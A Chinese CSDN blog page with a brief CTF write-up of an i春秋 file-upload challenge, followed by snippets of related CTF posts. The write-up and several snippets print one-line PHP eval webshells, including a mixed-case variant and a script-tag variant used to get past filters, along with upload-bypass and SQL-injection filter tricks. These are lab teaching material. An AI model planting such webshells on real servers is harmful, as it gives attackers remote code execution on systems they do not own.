i春秋web 想怎么传就怎么传,就是这么任性。

最新推荐文章于 2022-04-27 13:54:27 发布
最新推荐文章于 2022-04-27 13:54:27 发布
阅读量230 收藏
点赞数
分类专栏: ctf 文章标签: unctf php javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/enginers/article/details/117092175
版权
本文探讨了一次PHP文件上传漏洞的利用过程,通过抓包发现文件上传到`u/flag.php`并触发了`eval($_POST['a'])`。尽管存在过滤,但通过特定写法成功绕过,实现了木马上传。随后连接蚁剑,验证了攻击的有效性。文章聚焦于Web安全和PHP后端开发的安全防护问题。
摘要由CSDN通过智能技术生成

在这里插入图片描述
文件上传题,可联想到一句话木马
在这里插入图片描述

通过抓包知道上传的文件到u/flag.php里面,然后就可以写木马上传了

上传成功后访问上传的文件,发现直接输出了

eval($_POST[‘a’]) ?>
即被过滤了,查了一下网上有一种写法
在这里插入图片描述
连接蚁剑,成功
在这里插入图片描述
在这里插入图片描述

抬头、展望45°天空
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web-Upload[i春秋][50pt]
Laurel_60的博客
08-05 1336
> 去年写的,后面有点问题,懒得改了,要看就直接去翻我重写的另一篇吧2333 > https://laure1.github.io/2019/08/29/Summary-of-Web/#Upload
i春秋python_I春秋刷题 WEB
weixin_30399511的博客
02-01 632
I春秋刷题 WEB篇一、爆破-1题目内容:flag就在某六位变量中。include "flag.php";$a = @$_REQUEST['hello'];if(!preg_match('/^\w*$/',$a )){die('ERROR');}eval("var_dump($$a);");show_source(__FILE__);?>解答:preg_match('/^\w*$/',$...
题目内容: 怎么就怎么,就是这么任性
weixin_42695187的博客
07-07 663
打开题目 进入网页 上一个一个一句话病毒,以.php文件格式上 然后检查源代码
i春秋-CTF-web文件上
在Web和Reverse坑里游泳中。。。。
04-27 1781
前言 本来吧,悄悄摸鱼,整点啥打发时间,看视频太明显,于是做做题,眉头紧锁,仔细思考,装作工作很难的样子。 这回选择web类型的题目,主要是好久没做了,手有点生,找个简单的文件上练练。 打开题目环境发现: 好像是没有什么特别的。 但是往下翻看却是别有洞天。 众所周知,php是后端语言,正常情况下前端是看不到的,也就是说,出题人还是很贴心的(虽然我觉得出题人没那么好心)。 <?php header("Content-Type:text/html; charset=utf.
i春秋 upload
慢慢变小佬的博客
08-11 1792
 打开题目链接: 可以随意上文件, 上图片,txt文件,php文件等都能上上去; 试着上一句话; 当上一句话木马时,上成功后,原文件变成了如下: 把&lt;?和php过滤掉了,再上另一个一句话;  &lt;script language="PHP"&gt;  @eval($_POST["code"]); &lt;/script&gt; 上后连接菜刀;   ...
CTF学习记录 i春秋 《从0到1:CTFer成长之路》文件上
mastergu2的博客
10-21 4222
21.10.19 第二次开始学习CTF 感觉很有收获 至少有让自己忙起来了的感觉 感觉有一些学习状态了 打算重新记录一下学习笔记!加油 我会坚持下去的! 题目代码 首先附上题目的代码段(不完整) show_source(__FILE__); }else{ $file = $_FILES['file']; if(!$file){ exit("请勿上空文件"); } $name = $file['name']; $dir = 'upload/
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋杯等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际...
i春秋web-Login(细心、注意)
Sea_Sand息禅
05-22 1313
上来就是让登陆,尝试登录页面报错,查看源码得到:<!-- test1 test1 -->,这可能就是登录的账号和密码,果然成功,进入了member.php,但是并没有得到什么有用的信息。 刷新登录后的界面,尝试抓包进行分析,在响应头处发现: 有个show=0,难道是用来显示什么信息的?在请求部分加上show: 1 试了好几个地方,只有show加在Referer前面的时候响应部分...
i 春秋月刊 第 1 期到第 5 期
11-16
《i春秋月刊》系列是针对信息技术领域,特别是网络安全与编程技术的一套综合期刊,涵盖了从基础编程语言到高级安全话题的广泛内容。这五期的主题分别为:Python应用、代码审计、SQL注入和XSS攻击,这些都是IT行业中...
i春秋web-123(bak备份泄露)
Sea_Sand息禅
05-21 732
进站是一个登陆界面: 查看源码: 访问了一下user.php,然而页面是空的,试试有没有备份文件,果然是bak备份泄露,下载之后拿到了许多的用户名,但是密码中的日期并不知道,使用bp爆破有两种思路: 1)对一个用户名进行年份的爆破 2)对一个年份进行所有用户名的爆破 我选择的是第二个思路: payload里面两个地方都是载入的bak备份文件中的用户名,然后开始爆破(这里用的是1995年): 然后就...
i春秋WEB之Upload
金 帛的博客
02-12 439
i春秋webWP
i春秋web
qq_58091216的博客
03-28 4276
3.21 1.题目名称:常见的搜集 题目内容:一共3部分flag 敏感文件 解题思路:用dirsearch扫描网站 ,发现三个文件robots.txt,index.php~ ,.index.php.swp, dirsearch -u http://eci-2zegi8jh6a7iw18p2ptc.cloudeci1.ichunqiu.com/ 我们依次访问就可以得到flag 2.题目名称:粗心的小李...
i春秋CTF训练 Web Upload
椰奶冻不安全的博客
06-21 1327
Misc Web 爆破-2](https://www.ichunqiu.com/battalion?t=1) 题目内容:怎么就怎么,就是这么任性。 tips:flag在flag.php中 链接需到ichunqiu网站申请 访问网页得到文件上输入框 明显是文件上漏洞 方法一:上木马 上小马 <?pHp @eval($_POST['123']);?> 页面显示 @eval($_POST['123']);?> 把<?和php过滤了,可以用大小写绕过php的过
暑期web10:基础的文件上upload(i春秋)、上绕过(实验吧)
qq_41618162的博客
08-18 2772
介于之前做了个包括文件上步骤的题,突然拿两个之前做过的文件上题来回顾一下一些基础做法 首先是实验吧的上绕过 首先我们上最基础的一句话木马:&amp;lt;?php @eval($_POST['pass']);?&amp;gt; 反馈是‘不被允许的文件类型,仅支持上jpg,gif,png后缀的文件’ 于是我把他的后缀改为.jpg再上,又回显‘必须上后缀名为php的文件才行’ 做成php...
i春秋WEB CTF 2
cbhjerry的博客
11-16 2778
题6:SQL,出题人就告诉你这是个注入,有种别走! 解题:这是一个存在sql注入漏洞的题目, 通过手工测试发现程序对"SELECT","ORDER"进行了识别,即判断为注入行为,虽然对"AND"不进行识别,但如果其后面有"="同样认定为注入行为。同时发现了对"&lt;&gt;"进行了过滤,因此可将以上3个关键字换成"SELEC&lt;&gt;T",&quo
i春秋-ctf 文件上
AAAAAAAAAAAA66的博客
11-08 7437
文章目录 前言 一、题目 二、解题步骤 1.我的错误思路 2.正确解题姿势 总结 前言 CTF小白,这道题思考了很久,i春秋上现在也没write up,卡了1天了,后面在buuctf找到了题解答。通过这一天让我对文件上有了更深的理解。 目录 文章目录 一、题目进入环境。 二、解题步骤 1.我的错误思路 2.​​​​​​正确解题姿势 总结 一道普通的文件上题,通过一天的思考我得到这类题目的思路总结。 提示:以下是本篇文章正文内容,下
真的很简单 i春秋
WEB渗透测试 从入门到萌新
04-12 1014
题目描述 在环境里面 浏览器 访问http://file.ichunqiu.com/49ba59ab下载dedeCMS。 下载工具进行爆破 第一个是账号 、第二个是md5加密MD5免费在线解密破解_MD5在线加密-SOMD5 接下来是找后门目录。查找后台地址,手动输了几个常见的,结果不行;用御剑扫了一下,结果也扫不出来 我们进行百度搜索cms相关后台 dedeCMS漏洞:mysqli_error_trace.inc 文件里会残留后台路径。 dedeCMS目录中的data...
i春秋做题记录 web(一)
未完成的歌~的博客
11-03 1533
前言: 时间过的真快呀,一转眼半学期就过去了( ̄m ̄);攻防世界上的题差不多刷完了(剩下的都是不会的(T_T)),这周就来做做I春秋的题吧。 1、怎么就怎么,就是这么任性。 2、出题人就告诉你这是个注入,有种别走! 3、这个真的是爆破。 4、没错!就是文件包含漏洞
“百度杯”CTF比赛 九月场 upload
drip_big的博客
04-10 428
“百度杯”CTF比赛 九月场 题目内容: 怎么就怎么,就是这么任性。 tips:flag在flag.php中 测试可以上文件类型 .txt .php.js 都可以上成功 说明在上文件的过程中并无拦截 题目中的“怎么就怎么”说的没错 构造php脚本 既然有提示“tips:flag在flag.php中 ”,故只要可以阅读flag.php的内容即可。 <?php // get...
i春秋CVE-2022-32991
最新发布
08-12
我很抱歉,我无法回答你的问题。因为提供的引用内容与我可以回答的范围无关。请提供更明确的问题,我将尽力帮助你。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [【春秋云境】CVE-2022-32991靶场wp](https://blog.csdn.net/MONSTERinCAT/article/details/127261129)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值